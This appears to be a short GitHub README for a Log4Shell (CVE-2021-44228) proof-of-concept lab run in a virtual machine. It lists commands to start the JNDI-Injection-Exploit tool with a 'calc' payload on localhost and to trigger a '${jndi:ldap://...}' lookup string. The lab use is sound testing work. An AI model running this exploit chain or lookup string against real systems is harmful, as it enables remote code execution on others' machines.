/CVE-2021-44228_Log4Shell

Log4Shell A test for CVE-2021-44228

Primary LanguageJava

CVE-2021-44228_Log4Shell

Test source code for Log4Shell(CVE-2021-44228).

Step Information

  1. Install JDK8 (< 8u191) in virtual machine(Windows 10).

  2. Copy out\artifacts\POC_jar\POC.jar in Windows.

  3. Copy JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar in Windows, Get JNDI-Injection-Exploit

  4. Run java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A "127.0.0.1"

  5. Run java -jar POC.jar ${jndi:ldap://127.0.0.1:1389/*****}